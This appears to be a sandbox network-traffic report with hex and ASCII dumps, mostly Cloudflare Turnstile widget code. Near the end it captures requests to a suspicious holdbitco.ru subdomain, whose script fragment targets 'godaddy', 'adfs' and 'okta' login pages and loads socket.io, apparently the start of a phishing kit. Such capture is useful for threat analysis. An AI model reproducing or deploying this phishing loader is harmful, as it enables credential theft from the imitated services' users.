                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC590INData Raw: 65 2e 70 75 73 68 28 51 2e 45 58 45 43 55 54 45 29 2c 4e 2b 2b 3b 76 61 72 20 4c 74 3d 2b 6e 65 77 20 44 61 74 65 2c 50 74 3d 7b 7d 3b 67 2e 73 65 74 28 58 2c 4c 65 28 7b 69 64 78 3a 4e 2c 61 63 74 69 6f 6e 3a 62 2c 63 44 61 74 61 3a 41 2c 63 68 6c 50 61 67 65 44 61 74 61 3a 49 2c 63 62 53 75 63 63 65 73 73 3a 75 65 2c 63 62 45 72 72 6f 72 3a 64 65 2c 63 62 45 78 70 69 72 65 64 3a 53 65 2c 63 62 54 69 6d 65 6f 75 74 3a 6c 65 2c 63 62 55 6e 73 75 70 70 6f 72 74 65 64 3a 52 65 2c 63 62 41 66 74 65 72 49 6e 74 65 72 61 63 74 69 76 65 3a 73 65 2c 63 62 42 65 66 6f 72 65 49 6e 74 65 72 61 63 74 69 76 65 3a 66 65 2c 70 61 72 61 6d 73 3a 6f 2c 69 73 53 74 61 6c 65 3a 21 31 2c 69 73 45 78 70 69 72 65 64 3a 21 31 2c 69 73 45 78 65 63 75 74 69 6e 67 3a 4f 65 2c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: e.push(Q.EXECUTE),N++;var Lt=+new Date,Pt={};g.set(X,Le({idx:N,action:b,cData:A,chlPageData:I,cbSuccess:ue,cbError:de,cbExpired:Se,cbTimeout:le,cbUnsupported:Re,cbAfterInteractive:se,cbBeforeInteractive:fe,params:o,isStale:!1,isExpired:!1,isExecuting:Oe,i
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC591INData Raw: 3d 2d 31 2c 61 3d 21 30 2c 72 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 3d 67 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 62 3b 21 28 61 3d 28 62 3d 6f 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 61 3d 21 30 29 7b 76 61 72 20 41 3d 5f 65 28 62 2e 76 61 6c 75 65 2c 32 29 2c 49 3d 41 5b 30 5d 2c 45 3d 41 5b 31 5d 3b 74 3c 45 2e 69 64 78 26 26 28 63 3d 49 2c 74 3d 45 2e 69 64 78 29 7d 7d 63 61 74 63 68 28 54 29 7b 72 3d 21 30 2c 73 3d 54 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 61 26 26 6f 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 73 7d 7d 69 66 28 74 3d 3d 3d 2d 31 29 7b 70 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66
                                                                                                                                                                                                                                                                                                              Data Ascii: =-1,a=!0,r=!1,s=void 0;try{for(var o=g[Symbol.iterator](),b;!(a=(b=o.next()).done);a=!0){var A=_e(b.value,2),I=A[0],E=A[1];t<E.idx&&(c=I,t=E.idx)}}catch(T){r=!0,s=T}finally{try{!a&&o.return!=null&&o.return()}finally{if(r)throw s}}if(t===-1){p("Could not f
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC592INData Raw: 2c 5a 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 74 3d 63 2e 64 61 74 61 3b 69 66 28 74 2e 73 6f 75 72 63 65 3d 3d 3d 46 29 7b 69 66 28 21 47 74 28 63 29 29 7b 78 28 22 49 67 6e 6f 72 65 64 20 6d 65 73 73 61 67 65 20 66 72 6f 6d 20 77 72 6f 6e 67 20 6f 72 69 67 69 6e 3a 20 22 2b 63 2e 6f 72 69 67 69 6e 29 3b 72 65 74 75 72 6e 7d 69 66 28 21 28 21 74 2e 77 69 64 67 65 74 49 64 7c 7c 21 67 2e 68 61 73 28 74 2e 77 69 64 67 65 74 49 64 29 29 29 7b 76 61 72 20 61 3d 48 28 74 2e 77 69 64 67 65 74 49 64 29 2c 72 3d 67 2e 67 65 74 28 74 2e 77 69 64 67 65 74 49 64 29 3b 69 66 28 21 28 21 61 7c 7c 21 72 29 29 73 77 69 74 63 68 28 74 2e 65 76 65 6e 74 29 7b 63 61 73 65 22 69 6e 69 74 22 3a 7b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: ,Z=function(c){var t=c.data;if(t.source===F){if(!Gt(c)){x("Ignored message from wrong origin: "+c.origin);return}if(!(!t.widgetId||!g.has(t.widgetId))){var a=H(t.widgetId),r=g.get(t.widgetId);if(!(!a||!r))switch(t.event){case"init":{var s=document.getElem
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC594INData Raw: 74 53 3d 74 2e 63 66 43 68 6c 4f 75 74 53 29 2c 72 2e 69 73 45 78 65 63 75 74 69 6e 67 3d 21 31 2c 72 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 3d 21 30 2c 59 65 28 61 29 3b 76 61 72 20 45 3d 72 2e 63 62 45 72 72 6f 72 3b 69 66 28 45 29 7b 76 61 72 20 54 3b 45 28 28 54 3d 74 2e 63 6f 64 65 29 21 3d 3d 6e 75 6c 6c 26 26 54 21 3d 3d 76 6f 69 64 20 30 3f 54 3a 53 74 72 69 6e 67 28 61 74 29 29 7c 7c 28 74 2e 63 6f 64 65 26 26 78 28 74 2e 63 6f 64 65 29 2c 65 28 72 2c 61 2c 74 2e 63 6f 64 65 3d 3d 3d 22 63 72 61 73 68 65 64 22 29 29 7d 65 6c 73 65 20 74 2e 63 6f 64 65 3f 28 65 28 72 2c 61 2c 74 2e 63 6f 64 65 3d 3d 3d 22 63 72 61 73 68 65 64 22 29 2c 70 28 74 2e 63 6f 64 65 2c 33 30 37 36 29 29 3a 65 28 72 2c 61 2c 21 31 29 3b 62 72 65 61 6b 7d 63 61 73 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: tS=t.cfChlOutS),r.isExecuting=!1,r.isInitialized=!0,Ye(a);var E=r.cbError;if(E){var T;E((T=t.code)!==null&&T!==void 0?T:String(at))||(t.code&&x(t.code),e(r,a,t.code==="crashed"))}else t.code?(e(r,a,t.code==="crashed"),p(t.code,3076)):e(r,a,!1);break}case"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC595INData Raw: 72 2e 72 63 56 3d 24 2c 59 65 28 61 29 3b 76 61 72 20 73 65 3d 72 2e 63 62 54 69 6d 65 6f 75 74 3b 73 65 26 26 73 65 28 29 3b 62 72 65 61 6b 7d 63 61 73 65 22 72 65 66 72 65 73 68 52 65 71 75 65 73 74 22 3a 7b 72 2e 72 63 56 3d 24 2c 6d 28 61 29 3b 62 72 65 61 6b 7d 63 61 73 65 22 69 6e 74 65 72 61 63 74 69 76 65 42 65 67 69 6e 22 3a 7b 76 61 72 20 66 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 21 66 65 29 7b 70 28 22 43 61 6e 6e 6f 74 20 6c 61 79 6f 75 74 20 77 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28 61 2c 22 29 2e 22 29 2c 33 30 37 36 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 64 65 3d 72 2e 63 62 42 65 66 6f 72 65 49 6e 74 65 72 61 63 74
                                                                                                                                                                                                                                                                                                              Data Ascii: r.rcV=$,Ye(a);var se=r.cbTimeout;se&&se();break}case"refreshRequest":{r.rcV=$,m(a);break}case"interactiveBegin":{var fe=document.getElementById(a);if(!fe){p("Cannot layout widget, Element not found (#".concat(a,")."),3076);return}var de=r.cbBeforeInteract
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC596INData Raw: 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 5a 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 5f 29 7b 69 66 28 74 79 70 65 6f 66 20 5f 3d 3d 22 73 74 72 69 6e 67 22 29 7b 76 61 72 20 63 3d 77 65 28 5f 29 3b 69 66 28 63 26 26 67 2e 68 61 73 28 63 29 29 72 65 74 75 72 6e 20 63 3b 74 72 79 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5f 29 3b 72 65 74 75 72 6e 20 74 3f 43 28 74 29 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 69 66 28 4f 28 5f 2c 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 7b 76 61 72 20 61 3d 5f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 3b 72 65 74 75 72 6e 20 61 3f 77 65 28 61 2e 69 64 29 3a 6e 75 6c 6c 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: ddEventListener("message",Z);function C(_){if(typeof _=="string"){var c=we(_);if(c&&g.has(c))return c;try{var t=document.querySelector(_);return t?C(t):null}catch(r){return null}}if(O(_,HTMLElement)){var a=_.querySelector("iframe");return a?we(a.id):null}
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC598INData Raw: 2c 22 29 2c 20 65 78 65 63 75 74 65 28 29 20 77 69 6c 6c 20 72 65 74 75 72 6e 20 74 68 65 20 70 72 65 76 69 6f 75 73 20 74 6f 6b 65 6e 20 6f 62 74 61 69 6e 65 64 2e 20 43 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 72 65 73 65 74 28 29 20 62 65 66 6f 72 65 20 65 78 65 63 75 74 65 28 29 20 74 6f 20 6f 62 74 61 69 6e 20 61 20 66 72 65 73 68 20 74 6f 6b 65 6e 22 29 29 2c 73 2e 63 62 53 75 63 63 65 73 73 26 26 73 2e 63 62 53 75 63 63 65 73 73 28 73 2e 72 65 73 70 6f 6e 73 65 2c 21 31 29 3b 72 65 74 75 72 6e 7d 73 2e 69 73 53 74 61 6c 65 26 26 6d 28 6f 29 2c 73 2e 69 73 45 78 70 69 72 65 64 26 26 78 28 22 43 61 6c 6c 20 74 6f 20 65 78 65 63 75 74 65 20 6f 6e 20 61 20 65 78 70 69 72 65 64 2d 77 69 64 67 65 74 20 28 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 29 2c 20 63
                                                                                                                                                                                                                                                                                                              Data Ascii: ,"), execute() will return the previous token obtained. Consider using reset() before execute() to obtain a fresh token")),s.cbSuccess&&s.cbSuccess(s.response,!1);return}s.isStale&&m(o),s.isExpired&&x("Call to execute on a expired-widget (".concat(o,"), c
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC599INData Raw: 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 76 61 72 20 6e 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 69 74 65 6b 65 79 22 29 2c 69 3d 7b 73 69 74 65 6b 65 79 3a 6e 7d 2c 66 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 62 69 6e 64 65 78 22 29 3b 66 26 26 28 69 2e 74 61 62 69 6e 64 65 78 3d 70 61 72 73 65 49 6e 74 28 66 2c 31 30 29 29 3b 76 61 72 20 75 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 68 65 6d 65 22 29 3b 75 26 26 28 4d 65 28 75 29 3f 69 2e 74 68 65 6d 65 3d 75 3a 78 28 27 55 6e 6b 6e 6f 77 6e 20 64 61 74 61 2d 74 68 65 6d 65 20 76 61 6c 75 65 3a 20 22 27 2e 63 6f 6e 63 61 74 28 75 2c 27 22 27 29 29 29 3b 76 61 72 20 79 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22
                                                                                                                                                                                                                                                                                                              Data Ascii: unction Xt(e){var n=e.getAttribute("data-sitekey"),i={sitekey:n},f=e.getAttribute("data-tabindex");f&&(i.tabindex=parseInt(f,10));var u=e.getAttribute("data-theme");u&&(Me(u)?i.theme=u:x('Unknown data-theme value: "'.concat(u,'"')));var y=e.getAttribute("
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC600INData Raw: 20 63 6f 64 65 20 28 65 2e 67 2e 20 65 6e 29 20 6f 72 20 6c 61 6e 67 75 61 67 65 20 61 6e 64 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 20 28 65 2e 67 2e 20 65 6e 2d 55 53 29 22 29 29 29 3b 76 61 72 20 5f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 72 72 6f 72 2d 63 61 6c 6c 62 61 63 6b 22 29 3b 5f 26 26 77 69 6e 64 6f 77 5b 5f 5d 26 26 28 69 5b 22 65 72 72 6f 72 2d 63 61 6c 6c 62 61 63 6b 22 5d 3d 77 69 6e 64 6f 77 5b 5f 5d 29 3b 76 61 72 20 63 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 75 6e 73 75 70 70 6f 72 74 65 64 2d 63 61 6c 6c 62 61 63 6b 22 29 3b 63 26 26 77 69 6e 64 6f 77 5b 63 5d 26 26 5f 26 26 77 69 6e 64 6f 77 5b 5f 5d 26 26 28 69 5b 22 75 6e 73 75 70 70 6f 72 74 65 64 2d 63 61 6c 6c 62 61 63 6b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: code (e.g. en) or language and country code (e.g. en-US)")));var _=e.getAttribute("data-error-callback");_&&window[_]&&(i["error-callback"]=window[_]);var c=e.getAttribute("data-unsupported-callback");c&&window[c]&&_&&window[_]&&(i["unsupported-callback"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC602INData Raw: 65 3a 20 22 27 2e 63 6f 6e 63 61 74 28 54 2c 22 2c 20 65 78 70 65 63 74 65 64 20 65 69 74 68 65 72 3a 20 27 61 6c 77 61 79 73 27 2c 20 27 65 78 65 63 75 74 65 27 2c 20 6f 72 20 27 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 27 2e 22 29 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 4f 28 6e 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 6e 2e 73 72 63 29 29 72 65 74 75 72 6e 20 6e 3b 66 6f 72 28 76 61 72 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69
                                                                                                                                                                                                                                                                                                              Data Ascii: e: "'.concat(T,", expected either: 'always', 'execute', or 'interaction-only'."))),i}function Qt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,n=document.currentScript;if(O(n,HTMLScriptElement)&&e.test(n.src))return n;for(var i=document.querySelectorAll("scri
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC603INData Raw: 78 70 65 63 74 65 64 20 27 66 75 6e 63 74 69 6f 6e 27 2c 20 67 6f 74 20 27 22 29 2e 63 6f 6e 63 61 74 28 6b 28 77 69 6e 64 6f 77 5b 50 5d 29 2c 22 27 22 29 29 7d 2c 31 65 33 29 29 7d 2c 30 29 29 3b 76 61 72 20 69 65 2c 50 2c 4a 74 3d 22 74 75 72 6e 73 74 69 6c 65 22 69 6e 20 77 69 6e 64 6f 77 3b 4a 74 3f 78 28 22 54 75 72 6e 73 74 69 6c 65 20 61 6c 72 65 61 64 79 20 68 61 73 20 62 65 65 6e 20 6c 6f 61 64 65 64 2e 20 49 73 20 54 75 72 6e 73 74 69 6c 65 20 69 6d 70 6f 72 74 65 64 20 6d 75 6c 74 69 70 6c 65 20 74 69 6d 65 73 3f 22 29 3a 28 77 69 6e 64 6f 77 2e 74 75 72 6e 73 74 69 6c 65 3d 24 65 2c 28 4b 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 4b 2e 67 65 74 28 22 72 65 6e 64 65 72 22 29 29 21 3d 3d 22 65 78 70 6c 69 63 69 74 22 26 26 51 65 2e 70 75 73 68
                                                                                                                                                                                                                                                                                                              Data Ascii: xpected 'function', got '").concat(k(window[P]),"'"))},1e3))},0));var ie,P,Jt="turnstile"in window;Jt?x("Turnstile already has been loaded. Is Turnstile imported multiple times?"):(window.turnstile=$e,(K==null?void 0:K.get("render"))!=="explicit"&&Qe.push


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              44192.168.2.1649789104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC603OUTGET /web5/assets/js/pages-head-top-web.min.js?cb=1698251257410 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              45192.168.2.1649790104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC604OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              46104.21.0.95443192.168.2.1649790C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC604INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:38 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: max-age=300, public
                                                                                                                                                                                                                                                                                                              location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.js
                                                                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2m2Craq3Izwg%2Bw4%2B0q4XdYb8n3w5u%2F1dNre1X5yfpA96ZVhB2Nude29EAl9fwaZLSNLybCC%2BJqtadw%2FHP4rSq8GjUBSMzCnZYWCu6qgUQxW5X0vIk9Qi9ZHavqXA%2Fm59%2BxS%2Fq%2FvskijKXUcM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3febb401fdd-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC605INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              47192.168.2.1649791104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:38 UTC605OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              48104.21.0.95443192.168.2.1649789C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC606INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:38 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sat, 21 Oct 2023 21:38:03 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"95a-60840cdc5b469"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DZW1bRaXWtTDBtFjdm7MUIUdBSQNYGLifeFoXdHKa4NptZThUuVt9q8cPr1Cavf55KIitz6k9gpil5BpBZqmvJvg%2BwuvyYkSbA0HCBaMPMWAltBnyg%2BbEKjgKu2kZudy5azHJFNzyaOjGZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3fe7c880aa7-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC607INData Raw: 39 35 61 0d 0a 76 61 72 20 77 65 62 6e 61 6d 65 20 3d 20 22 2f 77 65 62 35 22 3b 0d 0a 2f 2f 20 76 61 72 20 77 65 62 73 69 74 65 6e 61 6d 65 73 20 3d 20 5b 22 67 6f 64 61 64 64 79 22 2c 20 22 61 64 66 73 22 2c 20 22 61 64 66 73 2d 73 69 64 65 62 61 72 22 2c 20 22 6f 6b 74 61 22 5d 3b 0d 0a 76 61 72 20 77 65 62 73 69 74 65 6e 61 6d 65 73 20 3d 20 5b 22 67 6f 64 61 64 64 79 22 5d 3b 0d 0a 2f 2f 20 63 6f 6e 73 74 20 63 61 63 68 65 42 75 73 74 65 72 20 3d 20 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 20 2f 20 31 30 30 30 29 3b 0d 0a 63 6f 6e 73 74 20 63 61 63 68 65 42 75 73 74 65 72 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 0d 0a 76 61 72 20 6c 69 6e 6b 45 6c 65 6d 65 6e 74 20 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 95avar webname = "/web5";// var websitenames = ["godaddy", "adfs", "adfs-sidebar", "okta"];var websitenames = ["godaddy"];// const cacheBuster = Math.round(new Date().getTime() / 1000);const cacheBuster = new Date().getTime();var linkElement =
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC607INData Raw: 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 73 63 72 69 70 74 45 6c 65 6d 65 6e 74 73 6f 63 6b 65 74 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 36 2e 30 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 22 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 45 6c 65 6d 65 6e 74 73 6f 63 6b 65 74 29 3b 0d 0a 76 61 72 20 6c 69 6e 6b 45 6c 65 6d 65 6e 74 63 73 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 0d 0a 6c 69 6e 6b 45 6c 65 6d 65 6e 74 63 73 73 2e 72 65 6c 20 3d 20 22 73 74 79 6c 65 73 68 65 65 74 22 3b 0d 0a 6c 69 6e 6b 45 6c 65 6d 65 6e 74 63 73 73 2e 68 72 65 66 20 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: Element("script");scriptElementsocket.src = "https://cdn.socket.io/4.6.0/socket.io.min.js";document.head.appendChild(scriptElementsocket);var linkElementcss = document.createElement("link");linkElementcss.rel = "stylesheet";linkElementcss.href =
